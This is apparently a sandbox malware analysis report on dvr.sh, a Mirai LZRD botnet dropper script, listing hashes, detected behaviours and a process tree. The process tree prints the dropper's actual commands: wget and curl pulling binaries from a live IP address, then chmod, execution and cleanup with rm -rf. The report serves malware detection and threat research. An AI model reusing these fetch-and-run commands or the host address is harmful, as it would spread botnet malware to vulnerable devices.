Overview

overview

10

Static

static

1

dvr.sh

ubuntu-18.04-amd64

10

dvr.sh

debian-9-armhf

10

dvr.sh

debian-9-mips

10

dvr.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    27-11-2024 13:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dvr.sh

  • Size

    1KB

  • MD5

    ea3e4ce3ad906187d77f71fd511caca5

  • SHA1

    1826d8941b0d1aaa76fdade685e66e31e3732399

  • SHA256

    4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621

  • SHA512

    e9ac3561d6872982e7647f162635fe522c9abca8ca686d2f4853f62ae099c9b4a9f43076fc8f96ce2fc17d2dc02eb10067d811db34dc039c9a8761457830d9f7

Score
10/10
mirailzrdbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (14503) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 3 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 7 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/dvr.sh
    /tmp/dvr.sh
    1⤵
    • Writes file to tmp directory
    PID:706
    • /usr/bin/wget
      wget http://154.216.20.149/bins/byte.x86
      2⤵
      • Writes file to tmp directory
      PID:710
    • /usr/bin/curl
      curl -O http://154.216.20.149/bins/byte.x86
      2⤵
      • Writes file to tmp directory
      PID:733
    • /bin/cat
      cat byte.x86
      2⤵
        PID:740
      • /bin/chmod
        chmod +x byte byte.x86 dvr.sh systemd-private-3d1ae4b42bdf4fa38f4c325bee39a0b0-systemd-timedated.service-g4on0w
        2⤵
        • File and Directory Permissions Modification
        PID:741
      • /tmp/byte
        ./byte byte.dvr
        2⤵
        • Executes dropped EXE
        PID:743
      • /bin/rm
        rm -rf byte
        2⤵
          PID:745
        • /usr/bin/wget
          wget http://154.216.20.149/bins/byte.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:746
        • /usr/bin/curl
          curl -O http://154.216.20.149/bins/byte.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:754
        • /bin/cat
          cat byte.mips
          2⤵
          • System Network Configuration Discovery
          PID:765
        • /bin/chmod
          chmod +x byte byte.mips byte.x86 dvr.sh systemd-private-3d1ae4b42bdf4fa38f4c325bee39a0b0-systemd-timedated.service-g4on0w
          2⤵
          • File and Directory Permissions Modification
          PID:766
        • /tmp/byte
          ./byte byte.dvr
          2⤵
          • Executes dropped EXE
          PID:768
        • /bin/rm
          rm -rf byte
          2⤵
            PID:770
          • /usr/bin/wget
            wget http://154.216.20.149/bins/byte.mpsl
            2⤵
            • Writes file to tmp directory
            PID:771
          • /usr/bin/curl
            curl -O http://154.216.20.149/bins/byte.mpsl
            2⤵
            • Writes file to tmp directory
            PID:778
          • /bin/cat
            cat byte.mpsl
            2⤵
              PID:797
            • /bin/chmod
              chmod +x byte byte.mips byte.mpsl byte.x86 dvr.sh
              2⤵
              • File and Directory Permissions Modification
              PID:798
            • /tmp/byte
              ./byte byte.dvr
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Reads runtime system information
              PID:799
            • /bin/rm
              rm -rf byte
              2⤵
                PID:804

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/byte
              Filesize

              137KB

              MD5

              442269900f28ef10d8b7a13f2bc5ed86

              SHA1

              2f997966590600fb4b5572f306a40bcbb6fe79eb

              SHA256

              a1badb5317009fe55702c638b0c5816a92337e855e83db12e99e721db7b193c3

              SHA512

              d861babc3d83bf705aa5efd5276e928d6335eabfe58c604968315f865ae1765fe9b099b21de8045b3acfc6b66b5c384ec39888dd72d69bc4105703cff9e19db1

              Download Submit

            • /tmp/byte
              Filesize

              137KB

              MD5

              973357b4367bf43c6f6cf45dac7c231b

              SHA1

              3040ad2b7b0943b5abb614780c1a43c7a3f3831c

              SHA256

              e35a1943ed7c2e95bb119671722cb8ea3d51810fe73a7e6950a4c8f3b8bdad33

              SHA512

              46dd2a46ab7cd95f2949b02f95d3706585457ceebad94e3a28fb4cfbc42f16cc31ef7e1f8cc2cf7e1a808a86eec2aae347be52526a96f0f17a1d566469f2cd94

              Download Submit

            • /tmp/byte.x86
              Filesize

              95KB

              MD5

              34ef09c6bfa12c8bb0a4eb1111163f49

              SHA1

              374e5712df7fba870afd7c7897c5bc23ba205f61

              SHA256

              537907609ffc903d04b1aa5309d9bd02b95a31f343763ae83cd61f9c1b797438

              SHA512

              4aecdc6165268aa3a214581b5bb1311ebd17b9a7f573fc45a914fd3c1b7c38faffbe7ca21628ca37752417c8270a66fa34d544a4e315271f462dd31953bd902f

              Download Submit